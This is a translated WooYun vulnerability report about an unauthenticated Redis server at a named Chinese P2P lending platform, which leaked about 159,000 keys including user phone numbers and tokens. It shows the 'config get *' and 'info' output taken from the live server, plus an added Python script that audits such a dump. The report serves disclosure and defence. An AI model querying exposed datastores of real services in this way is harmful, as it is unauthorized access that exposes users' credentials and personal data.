Vulnerability Summary

Defect ID: wooyun-2015-0161880

Title: Unauthorized access to a system of the P2P lending platform Baiyimao (佰亿猫) leaks a large number of user TOKENs

Vendor: 佰亿猫 (Baiyimao)

Author: sauren

Submitted: 2015-12-16 18:52

Fix time: 2016-01-28 17:10

Disclosed: 2016-01-28 17:10

Type: Unauthorized access / privilege bypass

Severity: High

Self-assessed Rank: 20

Status: Vendor could not be contacted, or the vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability Details

Disclosure status:

2015-12-16: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2016-01-28: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

Shenzhen Baiyimao Financial Services Co., Ltd. (深圳佰亿猫金融服务有限公司) was founded in 2015 with registered capital of RMB 10 million and more than 100 employees. It provides efficient, secure and convenient P2P wealth-management services to small and medium-sized enterprises and individual investors. Its management team comes from senior professionals in banking, law, risk control and the internet industry, with relevant domestic and international experience, and the company and its partner financial institutions strictly control risk on behalf of investors, building a distinctive competitive advantage and realising the dream of wealth management for everyone.
"Baiyimao" has partnered with Ping An Insurance to insure the personal account funds of individual investors on the platform, protecting investors' funds to the greatest extent and securing more rights and guarantees for investors.

Details:

Redis is accessible without authentication.

[Screenshot: baiyimao.png]


150,000+ (15W+) keys

[Screenshot: baiyimao1.png]


A large number of phone numbers plus authentication keys are leaked.

Proof of vulnerability:

www.baiyimao.com:0>config get *

dbfilename
authorized_keys
requirepass
masterauth
bind
unixsocket
logfile
pidfile
/var/run/redis.pid
maxmemory
0
maxmemory-samples
3
timeout
0
tcp-keepalive
0
auto-aof-rewrite-percentage
100
auto-aof-rewrite-min-size
1048576
hash-max-ziplist-entries
512
hash-max-ziplist-value
64
list-max-ziplist-entries
512
list-max-ziplist-value
64
set-max-intset-entries
512
zset-max-ziplist-entries
128
zset-max-ziplist-value
64
lua-time-limit
5000
slowlog-log-slower-than
10000
slowlog-max-len
128
port
6379
databases
16
repl-ping-slave-period
10
repl-timeout
60
maxclients
10000
watchdog-period
0
slave-priority
100
hz
10
no-appendfsync-on-rewrite
no
slave-serve-stale-data
yes
slave-read-only
yes
stop-writes-on-bgsave-error
yes
daemonize
no
rdbcompression
yes
rdbchecksum
yes
activerehashing
yes
repl-disable-tcp-nodelay
no
appendonly
no
dir
D:\redis
maxmemory-policy
volatile-lru
appendfsync
everysec
save
3600 1 300 100 60 10000
loglevel
notice
client-output-buffer-limit
normal 0 0 0 slave 268435456 67108864 60 pubsub 33554432 8388608 60
unixsocketperm
0
slaveof


Configuration output; this should be a Windows server.
www.baiyimao.com:0>info

# Server
redis_version:2.6.12
redis_git_sha1:00000000
redis_git_dirty:0
redis_mode:standalone
os:Windows
arch_bits:64
multiplexing_api:winsock_IOCP
gcc_version:0.0.0
process_id:856
run_id:b06673ac7e51e2fefef471993aa814bd551038fc
tcp_port:6379
uptime_in_seconds:1062308
uptime_in_days:12
hz:10
lru_clock:322447
# Clients
connected_clients:16
client_longest_output_list:0
client_biggest_input_buf:0
blocked_clients:0
# Memory
used_memory:31506040
used_memory_human:30.05M
used_memory_rss:31506040
used_memory_peak:38105100
used_memory_peak_human:36.34M
used_memory_lua:31744
mem_fragmentation_ratio:1.00
mem_allocator:libc
# Persistence
loading:0
rdb_changes_since_last_save:-22
rdb_bgsave_in_progress:0
rdb_last_save_time:1450259222
rdb_last_bgsave_status:ok
rdb_last_bgsave_time_sec:2
rdb_current_bgsave_time_sec:-1
aof_enabled:0
aof_rewrite_in_progress:0
aof_rewrite_scheduled:0
aof_last_rewrite_time_sec:-1
aof_current_rewrite_time_sec:-1
aof_last_bgrewrite_status:ok
# Stats
total_connections_received:2756
total_commands_processed:3347859
instantaneous_ops_per_sec:0
rejected_connections:0
expired_keys:10965
evicted_keys:0
keyspace_hits:2378785
keyspace_misses:120949
pubsub_channels:0
pubsub_patterns:0
latest_fork_usec:0
# Replication
role:master
connected_slaves:0
# CPU
used_cpu_sys:143.36
used_cpu_user:974.27
used_cpu_sys_children:0.00
used_cpu_user_children:0.00
# Keyspace
db0:keys=159352,expires=3521


Server INFO output

Fix:

Set a password on Redis.
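The following is an added example, not part of the original report: a small Python audit that parses the `config get *` output shown above (in the page's rendering, a key whose value is empty is followed directly by the next key) and flags the settings that left this instance open, namely an empty requirepass, an empty bind, the absence of protected-mode (which only exists from Redis 3.2 onward), and a non-default dbfilename. The key list and the sample dump are constructed from the values in the report.

```python
# Added example (not the report's own code): audit a Redis CONFIG GET dump.

# Keys taken from the dump in the report. Any line equal to one of these is
# treated as a key; the lines up to the next key are that key's value.
KNOWN_KEYS = {
    "dbfilename", "requirepass", "masterauth", "bind", "unixsocket", "logfile",
    "pidfile", "port", "dir", "daemonize", "maxmemory", "slaveof", "save",
    "protected-mode",  # introduced in Redis 3.2; absent from a 2.6.12 dump
}

def parse_config_dump(text):
    """Turn the key/value line dump into a dict; empty values become ''."""
    config, key, value_lines = {}, None, []
    for line in text.splitlines():
        line = line.strip()
        if line in KNOWN_KEYS:
            if key is not None:
                config[key] = " ".join(value_lines)
            key, value_lines = line, []
        elif key is not None and line:
            value_lines.append(line)
    if key is not None:
        config[key] = " ".join(value_lines)
    return config

def audit(config):
    """Return the weaknesses a defender should fix, most severe first."""
    findings = []
    if not config.get("requirepass"):
        findings.append("requirepass is empty: any client that reaches the port has full access")
    if not config.get("bind"):
        findings.append("bind is empty: Redis listens on every interface, not only loopback")
    if config.get("protected-mode", "no") != "yes":
        findings.append("protected-mode is off or unavailable (needs Redis 3.2+)")
    if config.get("dbfilename") not in (None, "dump.rdb"):
        findings.append("dbfilename is '%s', not the default dump.rdb: confirm this change was intended"
                        % config["dbfilename"])
    return findings

# Constructed excerpt of the dump from the report, empty values collapsed as on the page.
SAMPLE_DUMP = """\
dbfilename
authorized_keys
requirepass
masterauth
bind
unixsocket
logfile
pidfile
/var/run/redis.pid
port
6379
dir
D:\\redis
slaveof
"""

if __name__ == "__main__":
    for finding in audit(parse_config_dump(SAMPLE_DUMP)):
        print(finding)
```

Run against the sample, the audit reports four findings; a dump with requirepass set, bind 127.0.0.1, protected-mode yes and the default dbfilename reports none.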

Copyright notice: when reposting, please credit the source: sauren@乌云 (WooYun)


Vulnerability Response

Vendor response:

The vendor could not be contacted, or the vendor actively refused.